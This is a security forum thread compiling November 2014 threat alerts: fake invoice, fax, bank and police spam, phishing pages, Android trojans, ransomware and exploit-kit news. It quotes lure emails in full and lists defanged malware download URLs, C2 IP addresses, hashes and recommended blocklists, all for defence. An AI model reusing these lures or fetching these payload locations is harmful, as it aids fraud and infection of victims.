* https://www.virustotal.com/en/file/e2a53e440bf4b5528d3ddd751b23410f91fa1fd27ef830b3493497c63b89a9bd/analysis/1415704035/
- http://blog.dynamoo.com/2014/11/duplicate-payment-received-spam-has.html
11 Nov 2014
... Recommended blocklist:
178.254.57.146
213.140.115.29
62.76.180.133
62.76.189.108 "
___
Trojan SMS Found on Google Play
- https://blog.malwarebytes.org/mobile-2/2014/11/trojan-sms-found-on-google-play/
Nov 11, 2014 - "... this one slipped under Google Play’s radar, but an SMS Trojan app with the package name com.FREE_APPS_435.android claims to be a download for wallpapers, videos, and music is actively on the Google Play store (at least at the time of this writing it was).
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/ScreenShot1.jpg
... This tactic has been seen since malware started appearing on Android devices. If you visit the developer’s website from the link provided on the Google Play page, it takes you to a page with two banners and a couple of links.
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/ScreenShot3.jpg
... Google Play has been notified of the existence of this SMS Trojan. The last update of this app was August 20th 2013, which was most likely the date it was added to the Play store. Many variants of this Trojan have been seen that are not currently on the Play store. We flag this Trojan and similar variants as Android/Trojan.SMS.Agent. This is proof that Google Play isn’t perfect at alleviating all malware."
___
Predator Pain and Limitless... the Fraud
- http://blog.trendmicro.com/trendlabs-security-intelligence/predator-pain-and-limitless-behind-the-fraud/
Nov 11, 2014 - "ZeuS/ZBOT has been one of the most talked about malware families for several years, and with good reason... It is estimated that ZBOT has enabled cybercriminals to steal more than $100 million US dollars since its inception... the Commercial Crime Bureau of Hong Kong Police Force estimates this kind of fraud has netted attackers up to $75 million US dollars in the first half of this year, from Hong Kong alone... cybercriminals in a single city, within six-months, equaled all the losses from ZBOT up to the present. Unlike Zeus, Predator Pain and Limitless are relatively simple keyloggers. They indiscriminately steal web credentials and mail client credentials, as well as capturing keystrokes and screen captures. The output is human readable... clever targeting, patience, cunning and simple keyloggers have netted these cybercriminals large sums of money. These highlight that cybercrime activities are dependent not only on the sophistication of the tools used, but on how well organized the entire scheme is... The following graphs show the distribution of the victims that we observed, both by country and by industry:
Predator Pain/Limitless Victims by Country:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/Country-Distribution-01.jpg
Predator Pain/Limitless Victims by Industry:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/Industry-Distribution-01.jpg
- http://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/cybercrime-to-cyberspying-limitless-keylogger-and-predator-pain/
"... The cybercriminals instead went after SMBs (small and medium-sized businesses), which led us to realize how vulnerable they are to the threat..."
:mad: :fear:
AplusWebMaster
2014-11-12, 16:01
FYI...
Fake 'Police' SPAM ...
- http://blog.dynamoo.com/2014/11/exchange-house-fraud-police-headquaters.html
12 Nov 2014 - "I got a lot of these yesterday..
From: omaniex@ investigtion .com
Subject: Exchange House Fraud (Police Headquaters)
please note that your attension is needed in our station, as we got information on this fraud information as transactions detailed in attachment. kindly acknowledge this letter and report to our office as all report and contact details are in attachment. failure to this you will be held responsible.
Note: come along with your report as it will be needed
regards,
Police headquarters.
Investigtion dept.
Attached is a file EXCH DETAILS PR 7777709.zip which contains two files:
7 TRANSACTION RPPP 00000123-PDF.jar
PR0JECT INVESTIGATI 011111-PDF.jar
... malicious application written in Java (top tip - if you have Java installed on your computer, remove it. You probably -don't- need it). It has a VirusTotal detection rate of 7/55*..."
* https://www.virustotal.com/en/file/bd15776998194aa3a1be49a9eeb982fcb69cf57c76cd7319e1553b929b4f6349/analysis/1415792881/
___
ADP Past Due Invoice Spam
- http://threattrack.tumblr.com/post/102455898273/adp-past-due-invoice-spam
Nov 12, 2014 - "Subjects Seen:
ADP Past Due Invoice#54495150
Typical e-mail details:
Your ADP past due invoice is ready for your review at ADP Online Invoice Management .
If you have any questions regarding this invoice, please contact your ADP service team at the number provided on the invoice for assistance.
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the invoice.
Review your ADP past due invoice here.
Important: Please do not respond to this message. It comes from an unattended mailbox.
Malicious URLs:
kurdogluhotels .com/docfiles/invoice_1211.php
kevalee .ac.th/docfiles/invoice_1211.php
Malicious File Name and MD5:
invoice1211_pdf27.zip (05FC7646CF11B6E7FB124782DAF9FB53)
invoice1211_pdf.exe (78CF05FAA79B41B4BE4666E3496D1D54)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/4eb2bf63ec6433cda6fde59dcbf32fc9/tumblr_inline_nexql2Bx451r6pupn.png
Tagged: ADP, Upatre
- http://blog.dynamoo.com/2014/11/adp-past-due-invoice39911564-spam.html
12 Nov 2014
... Recommended blocklist:
188.165.206.208
shahlart .com
mboaqpweuhs .com "
- http://www.threattracksecurity.com/it-blog/adp-past-due-invoice-spam/
Nov 13, 2014 - "... the Upatre Trojan, which in turn downloaded and decrypted the banking-credential-stealing Trojan Dyre..."
Screenshot: http://www.threattracksecurity.com/it-blog/wp-content/uploads/2014/11/ADP-Past-Due-Invoice.png
94.23.49.77: https://www.virustotal.com/en/ip-address/94.23.49.77/information/
:mad: :fear:
AplusWebMaster
2014-11-13, 17:52
FYI...
Fake 'BankLine' SPAM - targets RBS customers
- http://blog.mxlab.eu/2014/11/13/fake-email-regarding-new-secure-message-from-bankline-that-targets-rbs-customers/
Nov 13, 2014 - "... intercepted -fake- emails regarding a new secure message from BankLine that targets RBS customers. The subject line is “You have received a new secure message from BankLine#24802254″ this email is sent from the spoofed address “Bankline <secure.message @ bankline .com>” and has the following body:
You have received a secure message.
Read your secure message by following the link bellow:
link-
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the Bankline Bank Secure Email Help Desk at 0131 556 1196.
First time users – will need to register after opening the attachment...
The embedded URL in our sample leads to hxxp ://vsrwhitefish .com/bankline/message.php. This will open up and HTML document with an integrated Javascript script that will make use of ActiveXObject or a regular HTTP request, opens up a download in order to open and/or save the malicious file as instructed."
216.251.43.98: https://www.virustotal.com/en/ip-address/216.251.43.98/information/
... 5/60 2014-11-13 13:23:41 http ://vsrwhitefish .com/bankline/message.php
___
Fake 'Voice mail' SPAM ...
- http://blog.mxlab.eu/2014/11/13/voice-message-emails-contains-security-threat/
Nov 13, 2014 - "... intercepted a large campaign by email with the subject “Voice Message #0768384921 (numbers may vary)” and is continuation of the previous campaign targeting RBS customers. This email is sent from the spoofed address “Message Admin <martin.smith@ essex .org.uk>” and has the following body:
Voice redirected message
hxxp ://crcmich .org/bankline/message.php
Sent: Thu, 13 Nov 2014 11:54:24 +0000
The embedded URL in our sample leads to hxxp ://crcmich .org/bankline/message.php. This will open up and HTML document with an integrated Javascript script that will make use of ActiveXObject or a regular HTTP request, opens up a download in order to open and/or save the malicious file as instructed."
69.160.53.51: https://www.virustotal.com/en/ip-address/69.160.53.51/information/
... 3/61 2014-11-13 15:04:47 http ://crcmich .org/bankline/message.php?
___
Alert (TA14-317A)
Apple iOS "Masque Attack" Technique
- https://www.us-cert.gov/ncas/alerts/TA14-317A
Nov 13, 2014
Systems Affected:
iOS devices running iOS 7.1.1, 7.1.2, 8.0, 8.1, and 8.1.1 beta.
Overview:
A technique labeled “Masque Attack” allows an attacker to substitute malware for a legitimate iOS app under a limited set of circumstances...
(More detail at the URL above.)
:mad: :fear:
AplusWebMaster
2014-11-14, 16:35
FYI...
Fake 'Amazon frozen account' – Phish ...
- http://myonlinesecurity.co.uk/amazon-account-frozen-temporarily-phishing/
14 Nov 2014 - "'Your account has been frozen temporarily' pretending to come from Amazon <auto-confirm@ amazon .co.uk> is one of the latest -phish- attempts to steal your Amazon Account and your Bank, credit card and personal details. This one only wants your personal details, Amazon log in details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/amazon_phishing-email.png
If you open the -attached- html file you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/amazon_login.png
When you fill in your user name and password you get a page looking like this, where the phishers try to validate your details to make sure that you are entering “genuine” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format. After submitting the information you get -bounced- on to the genuine Amazon .co.uk website:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/amazon_account_verification.png
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
___
CoinVault - new ransomware
- http://www.webroot.com/blog/2014/11/14/coinvault/
Nov 14, 2014 - "Today we encountered a new type of encrypting ransomware that looks to be of the cryptographic locker family. It employs the same method of encryption and has a very similar GUI (kills VSS, increases required payment every 24hr, uses bitcoin payment, etc.).
CoinVault GUI:
> https://i.imgur.com/ADEO21U.png
Here is the background* that it creates – also very similar.
* https://i.imgur.com/LAHkjT8.png
... this is the first Encrypting Ransomware that I’ve seen which actually gives you a free decrypt. It will let you pick any single file that you need after encryption and will decrypt it for you.
> http://i.imgur.com/F3enAqN.png
... it gives a good insight into what the actual decryption routine is like if you find yourself actually having to pay them. I suspect that this freebie will increase the number of people who will pay..."
- http://arstechnica.com/security/2014/11/new-cryptoware-title-borrows-page-from-drug-dealers/
Nov 14 2014
___
Flash Player updated ...
- https://blog.malwarebytes.org/online-security/2014/11/18-vulnerabilities-fixed-update-your-flash-player/
Nov 14, 2014 - "Adobe has fixed -18- vulnerabilities in their Flash Player, and you should update immediately, if you haven’t already done so. However, please ensure you’re installing / updating from the right place. For example:
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/adobupd1.jpg
The above site claims:
It is recommended that you update Flash to the latest version to view this page. Please update to continue. Your Flash Plugin version is too low, causing the current sites and related softwares can not be opened properly, please update your Flash Plugin now!
The site -forwards- visitors to a sign-up page offering a “Mac cleaning” tool... confusing for anybody expecting Adobe Flash updates.
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/adobupd2.jpg
The Adobe Flash Player website is the place to go for Flash installs*... Always cast a critical eye at the URL of any “Flash Player” site you happen to be on, and check the small print in case you end up with more than you bargained for. Fake Flash Player websites have been around for many years, and are often a prime source of unwanted PUP installs and the occasional slice of Malware..."
* http://get.adobe.com/flashplayer/ ... (Uncheck the 'McAfee' option if you choose not to use it...)
:fear::fear: :mad:
AplusWebMaster
2014-11-17, 15:07
FYI...
Fake Fax SPAM - malicious .DOCM attachment
- http://blog.dynamoo.com/2014/11/interfax-failed-fax-transmission-spam.html
17 Nov 2014 - "This -fake- fax spam comes with a malicious attachment
From: Interfax [uk@ interfax .net]
Date: 13 November 2014 20:29
Subject: Failed Fax Transmission to 01616133969@fax.tc<00441616133969>
Transmission Results
Destination Fax: 00441616133969
Contact Name: 01616133969@ fax .tc
Start Time: 2014/11/13 20:05:27
End Time: 2014/11/13 20:29:00
Transmission Result: 3220 - Communication error
Pages sent: 0
Subject: 140186561.XLS
CSID:
Duration (In Seconds): 103
Message ID: 485646629
Thank you for using Interfax ...
Attached is a malicious Word macro file called 00000293.docm which is currently undetected at VirusTotal*... Inside this .DOCM file is a malicious macro... which attempts to download a malicious binary from http ://agro2000 .cba .pl/js/bin.exe . This file is downloaded to %TEMP%\MRSWZZFEYPX.exe and the binary also has zero detections at VirusTotal**, and the Malwr report shows that it tries to connect to the following URL: http ://84.40.9.34 /lneinn/mo%26af.lipgs%2Bfn%7El%3Fboel%3D%3F+%3Fa%20%3F~pigc_k/ci$slf%2B%20l%3D%7E . It then drops a malicious DLL onto the target system which has a rather better detection rate of 12/53***. If you are a corporate email admistrator they you might consider blocking .DOCM files at the perimeter as I can see no valid reason these to be sent by email. You should definitely block 84.40.9.34 (Hostway, Belgium) as this is a known bad server that has been used in several recent attacks."
* https://www.virustotal.com/en/file/724b6ed9f68ae9e217f1b88a8107f7b3cb95cf8a55ce2fbf0a7c455099f66012/analysis/1416221806/
** https://www.virustotal.com/en/file/8307c13583837bcfc30e8c267133f33e3fff4d86abd59adcb7f1fb7dd04a0d54/analysis/1416222127/
*** https://www.virustotal.com/en/file/1a774212d3f20523c4ddd63dd657954eeb7bf97c19ce9a9838b5297239c0119b/analysis/1416222797/
84.40.9.34: https://www.virustotal.com/en/ip-address/84.40.9.34/information/
- http://myonlinesecurity.co.uk/failed-fax-transmission-01616133969fax-tc-word-doc-malware/
17 Nov 2014
> https://www.virustotal.com/en/file/724b6ed9f68ae9e217f1b88a8107f7b3cb95cf8a55ce2fbf0a7c455099f66012/analysis/1416212735/
___
Fake Investment SPAM ...
- http://myonlinesecurity.co.uk/investment-opportunities-ireland-malware/
17 Nov 2014 - "'Investment Opportunities in Ireland' pretending to come from IDA Ireland (Home of Foreign Businesses) <info@idaireland.com> with a link to a malicious zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/Investment-Opportunities-in-Ireland.png
Todays Date: investmentareas.rar: Extracts to: investmentareas.scr
Current Virus total detections: 26/55* . Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/b05b065ab2fbb6db6c29fd0a6ad856bca0fafe46322d91890dc1755788ea6e7b/analysis/1416215003/
___
Fake 'Payment Declined' Phish ...
- http://myonlinesecurity.co.uk/bt-account-payment-declined-phishing/
17 Nov 2014 - "Any phishing attempt wants to get as much personal and financial information from you as possible. This 'BT Account- Payment Declined' pretending to come from BT .com <noreplymail@ btc .com> phishing scam is one of them. The phishers try to use well known companies or Government departments like British Telecom, HMRC, Inland Revenue, Virgin Media, British Gas or any company that many people are likely to have an account with. This one wants your personal details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/BT-Account-Payment-Declined.png
The link in the email leads you to a webpage looking like:
Screenshot2: http://myonlinesecurity.co.uk/wp-content/uploads/2014/02/BT-billing-fake-log-in.png
That leads on to a page to enter all your details, including bank account, credit card, mother’s maiden name and everything else necessary to steal your identity and clean out your bank and credit card accounts:
Screenshot3: http://myonlinesecurity.co.uk/wp-content/uploads/2014/02/BT-billing-fake-details.png
Then you get a success page, where they kindly inform you that “The Anti Fraud System has been succesfully added to your account” and then are bounced to the real BT site:
Screenshot4: http://myonlinesecurity.co.uk/wp-content/uploads/2014/02/BT-billing-fake-details-success-.png
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... whether it is a straight forward attempt, like this one, to steal your personal, bank, credit card or email and social networking log in details. Be very careful when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should not be run or opened."
___
Fake 'Test message' SPAM plague continues..
- http://blog.dynamoo.com/2014/11/test-message-spam-plague-continues.html
17 Nov 2014 - "This plague of spam "test messages" have been going on for two days now, probably sourced from "Botnet 125"* which sends most of the spam I get. These messages are annoying but no harmful in themselves, I suspect they are probing mail servers for responses. If you have a catch-all email address then you will probably see a lot of these. The targets are either completely random or have been harvested from one data breach or another as far as I can see.
From: Hollie <Laurie.17@ 123goa .com>
Date: 17 November 2014 19:04
Subject: Test 8657443T
test message.
Murphy became a free agent on October 15, after refusing a minor league assignment. Silva implies the last cycle has begun, believing herself to be the host.
Icelandic had been heard. American CIA contract air crews and pilots from the Alabama Air Guard... ..."
* http://www.proofpoint.com/threatinsight/posts/dueling-dridex-campaigns-target-banking-customers.php
:mad: :fear:
AplusWebMaster
2014-11-18, 13:16
FYI...
Fake Invoice SPAM - Word doc malware attached
- http://myonlinesecurity.co.uk/email-contains-invoice-file-attachment-invoice-1633370-may-word-doc-malware/
18 May 2014 - "'Invoice #1633370 May' with a malicious word doc attachment saying 'This email contains an invoice file attachment' is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
This email contains an invoice file attachment
So far today, I have seen 3 different size files attached to this email, All file names are random:
18 November 2014 : invoice_796732903.doc (59kb) Current Virus total detections: 1/55*
18 November 2014 : invoice_1952581.doc (41kb) Current Virus total detections: 1/55**
18 November 2014 : invoice_80943810.doc (22kb) Current Virus total detections: 0/54***
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/0a78296121f16e13812c609c2d55245a492b6a992c99b403b2427e41acae9e72/analysis/1416303264/
** https://www.virustotal.com/en/file/70411393ea66130204abfb3653646dcb495538fbbc6a5a76bef1376625d2fcbf/analysis/1416304606/
*** https://www.virustotal.com/en/file/670011a08ddcde9d1892593a968f87e9e8800248f6bb9b8967b05ec4c34b64d0/analysis/1416304325/
___
Another Fake FAX SPAM run ...
- http://blog.dynamoo.com/2014/11/incoming-fax-report-spam-lets-party.html
18 Nov 2014 - "... 'need to load some more papyrus into the facsimile machine...:
From: Incoming Fax [no-reply@ efax .co.uk]
Date: 18 November 2014 13:16
Subject: INCOMING FAX REPORT : Remote ID: 766-868-5553
INCOMING FAX REPORT
Date/Time: Tue, 18 Nov 2014 14:16:58 +0100
Speed: 4222bps
Connection time: 01:09
Pages: 5
Resolution: Normal
Remote ID: 963-864-5728
Line number: 1
DTMF/DID:
Description: Internal report
We have uploaded fax report on dropbox, please use the following link to download your file...
This is (of course) utter bollocks, and the link in the email downloads a ZIP file document_8731_pdf.zip which in turn contains a malicious executable document_8731_pdf.exe which has a VirusTotal detection rate of 4/54*. According to the Malwr report it makes these following HTTP requests:
http ://108.61.229.224:13861 /1811us1/HOME/0/51-SP3/0/
http ://108.61.229.224:13861 /1811us1/HOME/1/0/0/
http ://159593.webhosting58 .1blu. de/mandoc/narutus1.pmg
It also drops a file EXE1.EXE onto the target system which has a detection rate of 7/55**...
Recommended blocklist:
108.61.229.224
159593.webhosting58 .1blu .de "
* https://www.virustotal.com/en/file/d567e8853aa3cbccbd5082471f761f75d77daf68c8d448e88875f141d6d0ab6f/analysis/1416318405/
... Behavioural information
TCP connections
108.61.229.224: https://www.virustotal.com/en/ip-address/108.61.229.224/information/
178.254.0.111: https://www.virustotal.com/en/ip-address/178.254.0.111/information/
** https://www.virustotal.com/en/file/5ec1e1850100849dd4750ef083824806304e82be5233e241b69b1960acc96324/analysis/1416318784/
- http://myonlinesecurity.co.uk/incoming-fax-report-remote-id-999-745-5477-fake-pdf-malware/
18 Nov 2014
- https://www.virustotal.com/en/file/d567e8853aa3cbccbd5082471f761f75d77daf68c8d448e88875f141d6d0ab6f/analysis/1416321619/
___
Fake Voice msg SPAM again - PDF malware
- http://myonlinesecurity.co.uk/voice-message-685-869-9737-mailbox-226-fake-pdf-malware/
18 Nov 2014 - "'voice message from 685-869-9737 for mailbox 226' pretending to come from 'Voice Mail <voicemail_sender@ voicemail .com> is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer... The email looks like:
You have received a voice mail message from 685-869-9737
Message length is 00:00:30. Message size is 225 KB.
Download your voicemail message from dropbox service below (Google Disk Drive Inc.)...
18 November 2014: document_8731_pdf.zip (12 kb): Extracts to: document_8731_pdf.exe
Current Virus total detections: 4/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/d567e8853aa3cbccbd5082471f761f75d77daf68c8d448e88875f141d6d0ab6f/analysis/1416321619/
:fear: :mad:
AplusWebMaster
2014-11-19, 16:24
FYI...
Fake Bank phish ...
- http://myonlinesecurity.co.uk/lloyds-bank-improving-current-account-phishing/
19 Nov 2014 - "There are a few major common subjects in a phishing attempt. The majority are either PayPal or your Bank or Credit Card, with a message saying some thing like :
-We’re improving your current account
-There have been unauthorised or suspicious attempts to log in to your account, please verify
-Your account has exceeded its limit and needs to be verified
-Your account will be suspended !
-You have received a secure message from < your bank>
-New Secure Message
-We are unable to verify your account information
-Update Personal Information
-Urgent Account Review Notification
-We recently noticed one or more attempts to log in to your PayPal account from a foreign IP address
-Confirmation of Order
This one is Lloyds bank 'We’re improving your current account' pretending to come from Lloyds Banking Group Plc <info@ emails.very .co.uk> The original email looks like this. It will NEVER be a genuine email from PayPal or Your Bank so don’t ever fill in the html (webpage) form that comes attached to the email. Some versions of this phish will have a link to a website that looks at first glance like the genuine bank website. Lloyds actually -do- allow you to pay in and perform some transactions at a Post Office rather than going to your branch, so many users might get unwittingly caught out by this one and think they need to notify the bank.
Email looks like:
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/lloyds-We-are-improving-your-current-account.png
This one wants your personal details and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details... whether it is a straight forward attempt, like this one, to steal your personal, bank, credit card or email and social networking log in details. If it says .EXE then it is a problem and should -not- be run or opened."
___
Azure cloud outages - MSN web portal offline
- http://www.reuters.com/article/2014/11/19/us-microsoft-web-idUSKCN0J309E20141119
Nov 18, 2014 11:53pm EST - "Microsoft Corp's Azure cloud-computing service, which hosts websites and lets customers store and manage data remotely, suffered serious outages on Tuesday taking its popular MSN web portal offline. According to Microsoft's Azure status page*, the problems started around 5pm Pacific time and have still not been fully solved..."
* http://azure.microsoft.com/en-us/status/#history
>> http://azure.microsoft.com/blog/2014/11/19/update-on-azure-storage-service-interruption/
Nov 19, 2014
:fear::fear: :mad:
AplusWebMaster
2014-11-20, 18:01
FYI...
Angler Exploit Kit adds New Flash Exploit...
- http://threatpost.com/angler-exploit-kit-adds-new-flash-exploit-for-cve-2014-8440/109498
Nov 20, 2014 - "... Angler is just one of the many such exploit kits available to attackers, but the creators of this one seem to be especially quick about adding exploits for new vulnerabilities to the kit. In October, a week after Adobe released its monthly patch update, researchers saw Angler exploiting an integer overflow in Flash that had just been patched. “This is really, really fast,” Kafeine, a French security researcher who identified the attack at the time, said. “The best I remember was maybe three weeks in February 2014.” Now, Kafeine said he already has seen Angler exploiting a Flash vulnerability that was patched Nov. 11 in Adobe’s November update release*. This vulnerability is CVE-2014-8440, a memory corruption flaw in Flash that can allow an attacker to take control of a target system. The bug exists in Flash on multiple platforms, including Windows, OS X and Linux, and Kafeine said it is getting its share of attention from attackers. “The vulnerability is being exploited in blind mass attack. No doubt about it: the team behind Angler is really good at what it does,” he said in a blog post*..."
* http://malware.dontneedcoffee.com/2014/11/cve-2014-8440.html
> https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8440 - 10.0 (HIGH)
Last revised: 11/12/2014
Flash test site: https://www.adobe.com/software/flash/about/
___
Fake Donation Overpayment SCAM
- https://www.ic3.gov/media/2014/141120.aspx
Nov 20, 2014 - "... received numerous complaints from businesses, charitable organizations, schools, universities, health related organizations, and non-profit organizations, reporting an online donation scheme. The complaints reported subjects who had donated thousands of dollars, via stolen credit cards. Once donations were made, the subjects immediately requested the majority of the donation back, but credited to a different card. They claimed to have mistakenly donated too much by adding an extra digit to the dollar amount (i.e., $5000 was ‘accidently’ entered instead of $500). However, very few complainants actually returned the money to the second credit card. Many, through their own investigations, discovered the original card was -stolen- or the credit card company notified them of such. Also, some of the organizations’ policies did not allow funds to be returned to a different credit card."
:fear::fear: :mad:
AplusWebMaster
2014-11-21, 19:59
:mad:FYI...
Something evil on 46.8.14.154
- http://blog.dynamoo.com/2014/11/something-evil-on-46814154.html
21 Nov 2014 - "46.8.14.154 (Netart Group S.r.o. / Movenix International Inc) forms part of an exploit chain that starts with compromised OpenX servers and appears to end up with an exploit kit of some sort... subdomains have been active on that server, they are ALL hijacked GoDaddy domains... (Long list @ the dynamoo URL above) ... The best thing to do is to -block- traffic to 46.8.14.154 because these domains seem to change every few minutes."
___
Fake 'Payment Received' SPAM - malicious DOC attachment
- http://blog.dynamoo.com/2014/11/duplicate-payment-received-spam-from.html
21 Nov 2014 - "This -fake- financial spam has a malicious Word document attached.
From: Enid Tyson
Date: 21 November 2014 15:36
Subject: INV209473A Duplicate Payment Received
Good afternoon,
I refer to the above invoice for which we received a bacs payment of £675.74 on 10th November 14. Please be advised that we already received payment for this invoice, by bacs on 30th October 2014.
I will therefore arrange a refund, please confirm preferred method, cheque or bacs transfer. If a cheque please confirm the name the cheque should be made out too or if bank transfer, please advise bank details.
If you have any queries regarding this matter, please do not hesitate to contact me.
I look forward to hearing from you .
Many thanks
Enid Tyson
Accounts Department
In this case the attachment is De_209473A.doc but it will probably vary with the subject name, the document itself has zero detections at VirusTotal (the Malwr report is inconclusive).This contains a malicious macro.. which connects to the following URL:
http ://79.137.227.123 :8080/get1/get1.php
...This has a VirusTotal detection rate of just 1/55*. The malware is hardened against analysis in a Sandbox so automated results are inconclusive...
UPDATE: A second version is going the rounds, with zero detections** and a download location of http :// 61.221.117.205 :8080/get1/get1.php ..."
* https://www.virustotal.com/en/file/7beee0920340d5a610f458ce1ebc0575e7854e88e2cbe1bebd8ec6014b778fe5/analysis/1416584784/
* https://www.virustotal.com/en/file/ea85382435cf26e8066780b7115e4beef78caa0e8766bff324ff19e216496e4b/analysis/1416584533/
:fear: :mad:
AplusWebMaster
2014-11-23, 00:05
FYI...
Fake 'Herbal Root' email SCAM
- http://blog.dynamoo.com/2014/11/oplamo-herbal-root-scam.html
22 Nov 2014 - "... there is no such thing as "Oplamo Herbal Root". So, this spam is almost definitely a scam.
From: Mr. Tom Good Hope [mrtomgood@ gmail .com]
Reply-To: mrtomgoodhope@ gmail .com
Date: 22 November 2014 02:24
Subject: SUPPLY BUSINESS OF OPLAMO
My name is Tom Goodhope i based in Liverpool,UK working with a pharmaceutical company.
I have decided to contact you directly to discuss briefly via email about the ongoing supply that came up in our company. I think if you can understand English and India Language (Hindi,Tamil etc) you can take up this business proposal to buy out OPLAMO HERBAL ROOT from the local producer in India and make supply to our company as the direct producer to enable our company be buying direct from you on every subsequent order after this first purchase. OPLAMO ROOT its used for production of Anti-viral drugs & Animal Vaccines.Our company have been purchasing the materials from Pakistan but it is very scarce and expensive now in Pakistan. I've found out the truth that this Pakistan people purchases this product in India at the rate of $210 USD, while they supply to our company at the rate of $430 USD... Upon your reply i will clarify you more on how to start this business immediately, please drop your contact phone number for me to be able to contact you ASAP.
Thanks,
Mr Tom Goodhope
Company Secretary ...
... the originating IP address is actually 123.239.58.103 in Delhi, sent via 198.20.245.154 [eas.easylhost .com] in the US... give it a very wide berth.
___
Fake 'my new photo' SPAM - malware - Google’s webp images
- http://myonlinesecurity.co.uk/new-photo-malware-googles-webp-images/
22 Nov 2014 - "... a persistent attack by email for some time now. The subject is always “my new photo” or the equivalent in Spanish. Until 2 days ago the -zip- attached to the email just contained a single malware file which is generally identified as Androm or Gamarue or Wauchos depending on which antivirus you have installed. It obviously takes a few hours or even a day or more for the antivirus companies to catch up with new versions so some users get infected. Over the last few days there has been a change in delivery methods. Along with the “normal” executable file there is what appears to be a standard jpg that won’t display natively in window explorer or in the majority of imaging/photo editing/viewing programs. It will display in Chrome browser. Looking at the file headers, the image is a genuine image but is the “new” webp format from google https ://developers.google .com/speed/webp/ which needs a codec from google to display in windows explorer or a plug in to display or use in common image editing/viewing programs. We will almost certainly see requests or comments in various forums or facebook or other tech help sites. It is believed that if a user “accidentally” or otherwise runs the exe file then the image is displayed in the browser (if chrome is default) or the google plugin or codec has been installed and the user thinks that it was just an image and not a malware file. Of course the .exe file has the extension hidden by default and the icon suggests it is a jpg image file which makes the unwary more likely to click on it and consequently become infected. I have been charting the progress of this malware for some time now, since it first appeared at end of August... we do see quite a few posts saying that the user cannot see the jpg image in an email or on a webpage in IE, FF etc but it -does- in chrome OR why they cannot view or edit a downloaded jpg. The zip file contains 2 files - 1 is a standard .exe with an icon that looks like a jpg that if you don’t have show hidden extensions shown can confuse a user and lead to infection when clicked on... If you open the image files in a hex editor or analysis program you will see the file type headers information:
for jpg they are ……JFIF…..`.`……Exif..MM
for PNG they are .PNG……..IHDR……………g…..sRGB………gAMA……a…..pHYs……….
For Webp they are RIFFhs..WEBPVP8 "
(Comparison example images shown at the URL at the top.)
:fear: :spider: :mad:
AplusWebMaster
2014-11-24, 19:00
FYI...
RFID Payment Cards Hack possible with Android App
- http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-rfid-payment-cards-made-possible-with-android-app/
Nov 24, 2014 - "... high-risk Android app detected as ANDROIDOS_STIP.A in Chile. This app, found distributed through forums and blogs, can be used to hack into the user’s RFID bus transit card to recharge the credits... Paying via RFID cards is becoming more popular nowadays as more mobile devices add NFC support. Banks, merchants or public services issue RFID cards to their customers with prepaid credits... Using widely available tools, the attacker cracked the card’s authentication key. With the cracked key and the native NFC support in Android and the device, cloning a card and adding credits can be easily implemented in a mobile app... These particular MIFARE models were discontinued years ago and supplemented with more secure models. However, it appears that card issuers have opted for cheaper solutions which put their customers at risk...
> http://blog.trendmicro.com/trendlabs-security-intelligence/good-nfc-habits/
We recommend customers take steps to protect RFID cards in their possession. They should also periodically check the balances of their accounts as well. In addition, if possible, they should check if any cards they are currently using are vulnerable and report these to their providers. RFID/NFC attacks are a well-known risk..."
> http://blog.trendmicro.com/trendlabs-security-intelligence/safe-nfc-for-businesses/
___
Fake MyFax SPAM - poorly-detected malware
- http://blog.dynamoo.com/2014/11/myfax-message-from-unknown-spam-leads.html
24 Nov 2014 - "Fax spam again... This spam appears to come from the person receiving it (which is an old trick).
From: victim@ victimdomain .com
Sent: 24 November 2014 15:31
To: norep.c@ mefax .com
Subject: MyFax message from "unknown" - 3 page(s)
Fax Message [Caller-ID: 1-407-067-7356]
http ://159593 .webhosting58 .1blu .de/messages/get_message.php
